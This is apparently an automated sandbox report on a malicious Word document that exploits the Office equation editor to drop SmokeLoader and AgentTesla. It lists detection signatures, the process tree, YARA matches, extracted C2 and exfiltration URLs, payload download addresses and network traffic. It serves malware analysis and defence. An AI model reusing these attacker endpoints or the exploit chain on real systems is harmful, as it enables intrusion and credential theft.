Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Draft Contract.docx

Overview

General Information

Sample Name:Draft Contract.docx
Analysis ID:751344
MD5:f234b75ef845ebf3fdee1da95855bfb5
SHA1:be749bba219ca80114f702b014151308d5e184d8
SHA256:c18b135527946cd4e984bdaa65aac4487e650c18791a40f30506dd3f4d2ca659
Infos:

Detection

AgentTesla, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
Encrypted powershell cmdline option found
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Shellcode detected
Office equation editor drops PE file
.NET source code contains very large array initializations
Contains an external reference to another file
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Checks if the current process is being debugged
Drops PE files to the user directory
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Searches for user specific document files
Enables debug privileges
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Office Equation Editor has been started
Contains functionality to download and launch executables
Found evaded block containing many API calls
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2492 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1452 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • regasm.exe (PID: 1472 cmdline: "C:\Users\Public\regasm.exe" MD5: FCAA733B76E66945EF88308FD504C0DC)
      • regasm.exe (PID: 1612 cmdline: "C:\Users\Public\regasm.exe" MD5: FCAA733B76E66945EF88308FD504C0DC)
        • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • A173.exe (PID: 260 cmdline: C:\Users\user\AppData\Local\Temp\A173.exe MD5: 2E1406B0FA96C7F11EA16768E01B2FD1)
            • powershell.exe (PID: 2336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwAwAA== MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
            • A173.exe (PID: 1300 cmdline: C:\Users\user\AppData\Local\Temp\A173.exe MD5: 2E1406B0FA96C7F11EA16768E01B2FD1)
          • explorer.exe (PID: 2032 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • explorer.exe (PID: 3000 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • explorer.exe (PID: 1460 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • explorer.exe (PID: 2196 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • explorer.exe (PID: 1780 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • explorer.exe (PID: 1440 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • explorer.exe (PID: 1820 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • Wlrfmqer.exe (PID: 2776 cmdline: "C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exe" MD5: 2E1406B0FA96C7F11EA16768E01B2FD1)
  • taskeng.exe (PID: 1920 cmdline: taskeng.exe {C1BB133C-EA54-4D9F-8B7A-F076882918C7} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • efbhiii (PID: 2040 cmdline: C:\Users\user\AppData\Roaming\efbhiii MD5: FCAA733B76E66945EF88308FD504C0DC)
      • efbhiii (PID: 2120 cmdline: C:\Users\user\AppData\Roaming\efbhiii MD5: FCAA733B76E66945EF88308FD504C0DC)
    • efbhiii (PID: 3004 cmdline: C:\Users\user\AppData\Roaming\efbhiii MD5: FCAA733B76E66945EF88308FD504C0DC)
      • efbhiii (PID: 2552 cmdline: C:\Users\user\AppData\Roaming\efbhiii MD5: FCAA733B76E66945EF88308FD504C0DC)
  • cleanup
{"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://dropbuyinc.ga/xplor/inc/9689eb892f604a.php"}
{"C2 list": ["http://esplogem.ga/", "http://poclecta.ga/"]}
SourceRuleDescriptionAuthorStrings
webSettings.xml.relsINDICATOR_XML_WebRelFrame_RemoteTemplateDetects XML web frame relations refrencing an external target in dropper OOXML documentsditekSHen
  • 0xee:$target1: /frame" Target="http
  • 0x190:$mode: TargetMode="External
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0000_000000_00000[1].docSUSP_INDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.ditekSHen
  • 0x6fd:$obj2: \objdata
  • 0xa26:$obj3: \objupdate
  • 0x6d9:$obj4: \objemb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0000_000000_00000[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x6fd:$obj2: \objdata
  • 0xa26:$obj3: \objupdate
  • 0x6d9:$obj4: \objemb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F43FFB53.docSUSP_INDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.ditekSHen
  • 0x6fd:$obj2: \objdata
  • 0xa26:$obj3: \objupdate
  • 0x6d9:$obj4: \objemb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F43FFB53.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x6fd:$obj2: \objdata
  • 0xa26:$obj3: \objupdate
  • 0x6d9:$obj4: \objemb
SourceRuleDescriptionAuthorStrings
00000009.00000002.980755023.00000000003C1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000009.00000002.980755023.00000000003C1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    0000000E.00000002.1038285242.00000000003D1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000000E.00000002.1038285242.00000000003D1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000014.00000002.1192013184.00000000000E1000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
        Click to see the 42 entries
        SourceRuleDescriptionAuthorStrings
        25.2.efbhiii.2215a0.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          15.2.A173.exe.31d2a10.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            15.2.A173.exe.31d2a10.2.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              15.2.A173.exe.31d2a10.2.raw.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x35161:$s10: logins
              • 0x34bdb:$s11: credential
              • 0x30e06:$g1: get_Clipboard
              • 0x30e14:$g2: get_Keyboard
              • 0x30e21:$g3: get_Password
              • 0x32201:$g4: get_CtrlKeyDown
              • 0x32211:$g5: get_ShiftKeyDown
              • 0x32222:$g6: get_AltKeyDown
              15.2.A173.exe.31d2a10.2.raw.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x32620:$a13: get_DnsResolver
              • 0x30cf4:$a20: get_LastAccessed
              • 0x3304e:$a27: set_InternalServerPort
              • 0x33383:$a30: set_GuidMasterKey
              • 0x30e06:$a33: get_Clipboard
              • 0x30e14:$a34: get_Keyboard
              • 0x32211:$a35: get_ShiftKeyDown
              • 0x32222:$a36: get_AltKeyDown
              • 0x30e21:$a37: get_Password
              • 0x3195d:$a38: get_PasswordHash
              • 0x32a82:$a39: get_DefaultCredentials
              Click to see the 31 entries

              Exploits

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1452, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe
              Timestamp:192.168.2.2234.174.217.4249173802851815 11/22/22-05:09:04.662213
              SID:2851815
              Source Port:49173
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://192.227.132.49/179/vbc.exehhC:Avira URL Cloud: Label: malware
              Source: http://192.227.132.49/179/vbc.exejAvira URL Cloud: Label: malware
              Source: http://3236135985/000000_0000000_000000_000000_0000000_000000_000000/0000_000000_00000.docAvira URL Cloud: Label: malware
              Source: http://192.227.132.49/179/vbc.exeAvira URL Cloud: Label: malware
              Source: http://192.227.132.49/000000_0000000_000000_000000_0000000_000000_000000/0000_000000_00000.docAvira URL Cloud: Label: malware
              Source: http://192.227.132.49/179/vbc.exent%Avira URL Cloud: Label: malware
              Source: https://ndtcconsultant.com/contract/2022-11-14_02-53.isoAvira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0000_000000_00000[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F43FFB53.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
              Source: Draft Contract.docxReversingLabs: Detection: 17%
              Source: Draft Contract.docxAvira: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exeReversingLabs: Detection: 35%
              Source: C:\Users\user\AppData\Roaming\efbhiiiReversingLabs: Detection: 35%
              Source: C:\Users\Public\regasm.exeReversingLabs: Detection: 35%
              Source: C:\Users\user\AppData\Roaming\efbhiiiJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\nEdENIr\nEdENIr.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\A173.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exeJoe Sandbox ML: detected
              Source: C:\Users\Public\regasm.exeJoe Sandbox ML: detected
              Source: 9.0.regasm.exe.400000.2.unpackAvira: Label: TR/Patched.Gen
              Source: 26.0.efbhiii.400000.0.unpackAvira: Label: TR/Patched.Gen
              Source: 26.0.efbhiii.400000.1.unpackAvira: Label: TR/Patched.Gen
              Source: 26.0.efbhiii.400000.3.unpackAvira: Label: TR/Patched.Gen
              Source: 9.0.regasm.exe.400000.0.unpackAvira: Label: TR/Patched.Gen
              Source: 27.0.A173.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
              Source: 9.0.regasm.exe.400000.1.unpackAvira: Label: TR/Patched.Gen
              Source: 9.0.regasm.exe.400000.4.unpackAvira: Label: TR/Patched.Gen
              Source: 9.0.regasm.exe.400000.3.unpackAvira: Label: TR/Patched.Gen
              Source: 26.0.efbhiii.400000.2.unpackAvira: Label: TR/Patched.Gen
              Source: 26.0.efbhiii.400000.4.unpackAvira: Label: TR/Patched.Gen
              Source: 00000009.00000002.980633512.0000000000320000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://esplogem.ga/", "http://poclecta.ga/"]}
              Source: 15.2.A173.exe.31d2a10.2.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://dropbuyinc.ga/xplor/inc/9689eb892f604a.php"}
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00123208 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,16_2_00123208
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00123533 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,16_2_00123533
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00123C12 RtlCompareMemory,CryptUnprotectData,16_2_00123C12
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0012213E CryptUnprotectData,RtlMoveMemory,16_2_0012213E
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_001211E6 CryptBinaryToStringA,CryptBinaryToStringA,16_2_001211E6
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0012122F lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,16_2_0012122F
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00121289 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,16_2_00121289
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000C26AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,18_2_000C26AC

              Exploits

              barindex
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\regasm.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\regasm.exeJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.227.132.49 Port: 80Jump to behavior
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: unknownHTTPS traffic detected: 69.160.38.3:443 -> 192.168.2.22:49174 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: unknownHTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.22:49177 version: TLS 1.2
              Source: Binary string: axHFC:\kozabog.pdbX source: regasm.exe, 00000007.00000000.921784664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, regasm.exe, 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, regasm.exe, 00000009.00000000.926919421.0000000000401000.00000020.00000001.01000000.00000004.sdmp, efbhiii, 0000000D.00000000.1016958723.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 0000000D.00000002.1022657509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 0000000E.00000000.1021674670.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 00000019.00000002.1137304433.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 00000019.00000000.1128348708.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 0000001A.00000000.1135363474.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii.11.dr
              Source: Binary string: C:\kozabog.pdb source: regasm.exe, regasm.exe, 00000007.00000000.921784664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, regasm.exe, 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, regasm.exe, 00000009.00000000.926919421.0000000000401000.00000020.00000001.01000000.00000004.sdmp, efbhiii, 0000000D.00000000.1016958723.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 0000000D.00000002.1022657509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 0000000E.00000000.1021674670.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 00000019.00000002.1137304433.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 00000019.00000000.1128348708.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii, 0000001A.00000000.1135363474.0000000000401000.00000020.00000001.01000000.00000005.sdmp, efbhiii.11.dr
              Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: number of queries: 1032
              Source: C:\Users\Public\regasm.exeCode function: 7_2_004042A3 BuildCommDCBAndTimeoutsA,CreateMailslotW,GetDriveTypeA,GetCurrentDirectoryA,CallNamedPipeA,IsSystemResumeAutomatic,SearchPathA,TransactNamedPipe,OpenWaitableTimerA,FindNextVolumeMountPointW,ReadConsoleInputW,GetLogicalDriveStringsW,CreateDirectoryExW,FindNextVolumeMountPointA,VirtualFree,GetModuleHandleW,GetWindowsDirectoryW,GetMailslotInfo,CreateFileA,TlsGetValue,LocalSize,RequestWakeupLatency,EnumCalendarInfoExA,QueryDosDeviceA,VerifyVersionInfoW,GetEnvironmentStrings,SetVolumeLabelA,7_2_004042A3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00123CE7 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,16_2_00123CE7
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00121EBA FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,16_2_00121EBA
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00122C85 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,16_2_00122C85
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000C255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,18_2_000C255C

              Software Vulnerabilities

              barindex
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_037605FB ShellExecuteW,ExitProcess,5_2_037605FB
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_0376055E LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_0376055E
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_037605CD URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_037605CD
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_037604B3 ExitProcess,5_2_037604B3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_03760578 URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_03760578
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_037605E6 ShellExecuteW,ExitProcess,5_2_037605E6
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_03760620 ExitProcess,5_2_03760620
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_037604E8 URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_037604E8
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_037604CC URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_037604CC
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49171
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.132.49:80
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
              Source: global trafficTCP traffic: 192.227.132.49:80 -> 192.168.2.22:49172
